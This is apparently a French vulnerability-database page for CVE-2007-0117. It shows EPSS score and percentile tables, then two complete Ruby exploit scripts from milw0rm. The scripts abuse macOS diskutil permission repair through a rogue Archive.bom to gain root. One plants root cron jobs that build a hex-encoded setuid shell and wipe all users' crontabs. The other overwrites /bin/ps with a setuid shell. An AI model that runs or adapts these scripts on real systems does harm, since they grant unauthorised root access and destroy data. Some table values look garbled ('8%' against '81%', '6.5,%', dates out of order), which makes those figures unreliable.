CVE-2007-0117 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	3.69%	–	–
2022-04-03	–	–	3.69%	–	–
2022-04-10	–	–	3.69%	–	–
2022-10-23	–	–	3.69%	–	–
2023-01-01	–	–	3.69%	–	–
2023-01-15	–	–	3.69%	–	–
2023-03-12	–	–	–	0.73%	–
2023-09-03	–	–	–	0.71%	–
2024-02-11	–	–	–	0.71%	–
2024-06-02	–	–	–	0.71%	–
2024-06-02	–	–	–	0.71%	–
2024-06-30	–	–	–	0.71%	–
2024-12-22	–	–	–	0.71%	–
2025-03-02	–	–	–	0.71%	–
2025-01-19	–	–	–	0.71%	–
2025-03-09	–	–	–	0.71%	–
2025-03-18	–	–	–	–	5.75%
2025-03-30	–	–	–	–	6.5%
2025-04-15	–	–	–	–	6.5%
2025-04-15	–	–	–	–	6.5,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	67%
2022-04-03	83%
2022-04-10	84%
2022-10-23	85%
2023-01-01	84%
2023-01-15	85%
2023-03-12	78%
2023-09-03	78%
2024-02-11	8%
2024-06-02	8%
2024-06-02	8%
2024-06-30	81%
2024-12-22	8%
2025-03-02	81%
2025-01-19	8%
2025-03-09	81%
2025-03-18	9%
2025-03-30	9%
2025-04-15	91%
2025-04-15	91%

#!/usr/bin/ruby # (c) 2006 LMH <lmh [at] info-pull.com> (code from the other exploit, porting) # Kevin Finisterre <kf_lists [at] digitalmunition.com> (crontab rock and roll) # # Second exploit for MOAB-05-01-2007, uses crontab. much more simple than the other one. # And works like a charm. require 'fileutils' EVIL_COMMANDS = [ "rm /Library/Receipts/Essentials.pkg/Contents/Archive.bom ", "echo -e \"\\x6d\\x61\\x69\\x6e\\x28\\x29\\x7b\\x20\\x73\\x65\\x74\\x65\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x65\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x79\\x73\\x74\\x65\\x6d\\x28\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x20\\x2d\\x69\\x22\\x29\\x3b\\x20\\x7d\\x0a\" > /tmp/finisterre.c", "/usr/bin/cc -o /Users/Shared/shX /tmp/finisterre.c; rm /tmp/finisterre.c", "/bin/cp -r /var/cron/tabs /Users/Shared", # I have no legit crontabs so I don't care. "/usr/bin/say Flavor Flave a k a `whoami` && sleep 5 && /usr/bin/say sleeping briefly && sleep 5 && chmod +s /Users/Shared/shX && sleep 5", "echo '' > /tmp/pwnclean", "for each in `ls /var/cron/tabs/`; do crontab -u $each /tmp/pwnclean; done", # Sorry if you had any legit crontabs... "crontab /tmp/pwnclean", # Just to make sure "rm -rf /tmp/pwn*", ] TARGET_BOM_PATH = "/Library/Receipts/Essentials.pkg/Contents/Archive.bom" SHELL_TEMPLATE = "mkdir -p /tmp/pwndertino/var/cron/tabs\n" + "cd /tmp/pwndertino\n" + "chmod 777 var/cron/tabs\n" + "mkbom . /tmp/pwned.bom\n" + "cp /tmp/pwned.bom #{TARGET_BOM_PATH}\n" + "/usr/sbin/diskutil repairPermissions /\n" if ARGV[0] != "repair" # Backup if its there! Some times it is not. if File.exists?(TARGET_BOM_PATH) FileUtils.cp(TARGET_BOM_PATH, File.join("/Users/Shared", File.basename(TARGET_BOM_PATH))) end puts "++ Dropping the 31337 .sh skillz" shell_script = File.new("moab5.sh", "w") shell_script.print(SHELL_TEMPLATE) puts "++ Fixing up crontabs" EVIL_COMMANDS.each do |cmd| shell_script.print("echo '* * * * * #{cmd}' >> /var/cron/tabs/root\n") end shell_script.print("echo '* * * * * /bin/rm -rf /tmp/pwned.bom /tmp/pwndertino' >> /tmp/pwncron\n") shell_script.print("crontab /tmp/pwncron\n") # You may need to sleep here shell_script.close puts "++ Execute moab5.sh" FileUtils.chmod 0755, "./moab5.sh" exec "/bin/sh", "-c", "./moab5.sh" puts "++ Run the repair script when you are all done." else # minor repair for a post-testing scenario if File.exists?(File.join("/Users/Shared", File.basename(TARGET_BOM_PATH))) FileUtils.cp(File.join("/Users/Shared", File.basename(TARGET_BOM_PATH)), TARGET_BOM_PATH) # restore backup FileUtils.rm_f(File.join("/Users/Shared", File.basename(TARGET_BOM_PATH))) exec "/usr/sbin/diskutil repairPermissions /" else exec "/usr/sbin/diskutil repairPermissions /" end end # milw0rm.com [2007-01-05]

#!/usr/bin/ruby # (c) 2006 LMH <lmh [at] info-pull.com> # Kevin Finisterre <kf_lists [at] digitalmunition.com> # # Thanks to The French Connection for bringing this in-the-wild 0-day to # our attention. If /tmp/ps2 exists on your system, you've been pwned already. # Thanks to the original authors of the exploit ('meow'). You know who you are. # # "They did it for the lulz" - A Fakecure spokesperson on the 'Mother Of all Bombs'. # "kcoc kcus I ro tcarter uoY" - The Original Drama P3dobear (Kumo' n'). # require 'fileutils' # Basic configuration TARGET_BINARY = "/bin/ps" # Changing this requires you to create a new TEH_EVIL_BOM TARGET_BACKUP_PATH = "/tmp/ps2" # see: "man lsbom" and "man mkbom" TARGET_SHELL_PATH = "/usr/bin/id" # Ensure the binary doesn't drop privileges! BOMARCHIVE_PATH = "/Library/Receipts/Essentials.pkg/Contents/Archive.bom" DISKUTIL_PATH = "/usr/sbin/diskutil" TEH_EVIL_BOM = File.read("Evil.bom") # # Repair a rogue installation using the back-up files. Useful for testing. # Probably you don't want to repair on real pwnage... :-) # def do_repair() puts "++ Repairing (moving back-ups to original path)" puts "++ #{File.basename(BOMARCHIVE_PATH)}" FileUtils.rm_f BOMARCHIVE_PATH FileUtils.cp File.join("/tmp", File.basename(BOMARCHIVE_PATH)), BOMARCHIVE_PATH puts "++ #{TARGET_BINARY}" FileUtils.rm_f TARGET_BINARY FileUtils.cp TARGET_BACKUP_PATH, TARGET_BINARY puts "++ Removing back-ups..." FileUtils.rm_f TARGET_BACKUP_PATH FileUtils.rm_f File.join("/tmp", File.basename(BOMARCHIVE_PATH)) puts "++ Done. Repairing disk permissions..." exec "#{DISKUTIL_PATH} repairPermissions /" end # # Ovewrite TARGET_BINARY with TARGET_SHELL_PATH and set the rogue permissions unless # they are already properly set. # def exploit_bomb() puts "++ We get signal. Overwriting #{TARGET_BINARY} with #{TARGET_SHELL_PATH}." # Overwriting with this method will always work well if binary at TARGET_SHELL_PATH # is bigger than TARGET_BINARY (ex. /bin/sh is 1068844 bytes and /bin/ps is 68432). # An alternative method is running diskutil again to set the rogue permissions. over = File.new(TARGET_BINARY, "w") over.write(File.read(TARGET_SHELL_PATH)) over.close unless FileTest.setuid?(TARGET_BINARY) fork do FileUtils.rm_f TARGET_BINARY FileUtils.cp TARGET_SHELL_PATH, TARGET_BINARY exec "#{DISKUTIL_PATH} repairPermissions /" end Process.wait end puts "++ Done. Happy ruuting." end # # Overwrite the BOM with the rogue version, set new permissions. # def set_up_the_bomb() puts "++ Preparing to overwrite (#{BOMARCHIVE_PATH})" # Back-up the original Archive.bom, set mode to 777 if FileTest.writable?(BOMARCHIVE_PATH) backup_path = File.join("/tmp", File.basename(BOMARCHIVE_PATH)) unless FileTest.exists?(backup_path) puts "++ Creating backup copy at #{backup_path}" FileUtils.cp BOMARCHIVE_PATH, backup_path end puts "++ Removing original file." FileUtils.rm_f BOMARCHIVE_PATH puts "++ Writing backdoor BOM file." target_bom = File.new(BOMARCHIVE_PATH, "w") target_bom.write(TEH_EVIL_BOM) target_bom.close puts "++ Done." else puts "-- Can't write to '#{BOMARCHIVE_PATH}. No pwnage for you today." exit end # Back-up the target backdoor path unless FileTest.exists?(TARGET_BACKUP_PATH) puts "++ Creating backup copy of #{TARGET_BINARY} at #{TARGET_BACKUP_PATH}" FileUtils.cp TARGET_BINARY, TARGET_BACKUP_PATH end # Let diskutil do it's job (set permissions over target binary path, setuid) puts "++ Running diskutil to set the new permissions for the backdoor..." fork do exec "#{DISKUTIL_PATH} repairPermissions /" end Process.wait puts "++ Somebody set up us the bomb!" exploit_bomb() end # Here be pwnies if ARGV[0] == "repair" do_repair() else set_up_the_bomb() end # milw0rm.com [2007-01-05]